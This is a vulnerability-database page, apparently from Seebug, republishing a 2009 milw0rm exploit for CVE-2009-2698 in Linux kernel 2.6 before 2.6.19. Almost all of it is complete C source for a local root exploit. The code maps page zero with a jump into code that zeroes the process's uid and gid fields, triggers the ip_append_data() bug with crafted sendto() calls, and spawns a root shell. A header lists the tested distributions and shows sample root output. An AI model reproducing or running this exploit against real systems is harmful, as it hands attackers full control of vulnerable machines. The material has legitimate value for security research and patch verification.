Lucene search

K
seebugRootSSV:66851
HistoryJul 01, 2014 - 12:00 a.m.

Linux Kernel 2.6 < 2.6.19 - (32bit) ip_append_data() ring0 Root Exploit

2014-07-0100:00:00
Root
www.seebug.org
617

0.0005 Low

EPSS

Percentile

15.4%

No description provided by source.


                                                /*
**
** 0x82-CVE-2009-2698
** Linux kernel 2.6 &#60; 2.6.19 (32bit) ip_append_data() local ring0 root exploit
**
** Tested White Box 4(2.6.9-5.ELsmp),
** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),
** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5),
** Fedora Core 6(2.6.18-1.2798.fc6).
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** Thankful to them.
**
** --
** bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
** sh-3.1# id
** uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t
** sh-3.1#
** --
** exploit by &#60;p0c73n1(at)gmail(dot)com&#62;.
**
*/

#include &#60;stdio.h&#62;
#include &#60;unistd.h&#62;
#include &#60;string.h&#62;
#include &#60;sys/socket.h&#62;
#include &#60;sys/mman.h&#62;
#include &#60;fcntl.h&#62;
#include &#60;sys/personality.h&#62;

unsigned int uid, gid;
void get_root_uid(unsigned *task)
{
	unsigned *addr=task;
	while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){
		addr++;
	}
	addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */
	addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */
	return;
}
void exploit();
void kernel_code()
{
	asm(&#34;exploit:\n&#34;
		&#34;push %eax\n&#34;
		&#34;movl $0xfffff000,%eax\n&#34;
		&#34;andl %esp,%eax\n&#34;
		&#34;pushl (%eax)\n&#34;
		&#34;call get_root_uid\n&#34;
		&#34;addl $4,%esp\n&#34;
		&#34;popl %eax\n&#34;);
	return;
}
void *kernel=kernel_code;

int main(int argc, char **argv)
{
	int fd=0;
	char buf[1024];
	struct sockaddr x0x;
	void *zero_page;

	uid=getuid();
	gid=getgid();
	if(uid==0){
		fprintf(stderr,&#34;[-] check ur uid\n&#34;);
		return -1;
	}
	if(personality(0xffffffff)==PER_SVR4){
		if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
			perror(&#34;[-] mprotect()&#34;);
			return -1;
		}
	}
	else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
			perror(&#34;[-] mmap()&#34;);
			return -1;
	}
	*(unsigned long *)0x0=0x90909090;
	*(char *)0x00000004=0x90; /* +1 */
	*(char *)0x00000005=0xff;
	*(char *)0x00000006=0x25;
	*(unsigned long *)0x00000007=(unsigned long)&kernel;
	*(char *)0x0000000b=0xc3;

	if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){
		perror(&#34;[-] socket()&#34;);
		return -1;
	}
	x0x.sa_family=AF_UNSPEC;
	memset(x0x.sa_data,0x82,14);
	memset((char *)buf,0,sizeof(buf));
	sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x));
	sendto(fd,buf,1024,0,&x0x,sizeof(x0x));
	if(getuid()==uid){
		printf(&#34;[-] exploit failed, try again\n&#34;);
		return -1;
	}
	close(fd);
	execl(&#34;/bin/sh&#34;,&#34;sh&#34;,&#34;-i&#34;,NULL);
	return 0;
}

/* eoc */

// milw0rm.com [2009-08-31]